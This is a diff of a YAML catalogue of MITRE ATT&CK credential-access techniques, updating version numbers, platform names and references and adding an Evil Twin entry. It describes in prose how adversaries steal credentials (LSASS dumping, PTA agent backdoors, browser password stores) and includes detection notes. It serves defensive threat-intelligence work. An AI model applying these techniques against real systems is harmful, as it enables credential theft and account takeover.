-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -45064,14 +45773,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45093,23 +45794,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45160,12 +45852,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45177,6 +45868,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -45191,18 +45883,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -45225,37 +45917,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -45263,9 +46033,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -45274,21 +46044,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -45328,55 +46099,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45406,6 +46132,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45415,23 +46147,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45468,23 +46235,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45517,21 +46284,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45542,7 +46308,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45576,7 +46342,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45604,7 +46370,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45615,14 +46381,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45730,12 +46495,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45772,6 +46536,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45784,7 +46549,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45834,12 +46599,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45865,6 +46629,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45880,18 +46645,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45918,14 +46683,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45936,13 +46698,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45956,6 +46718,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45966,12 +46729,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46046,7 +46809,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -46092,7 +46854,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46127,16 +46889,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
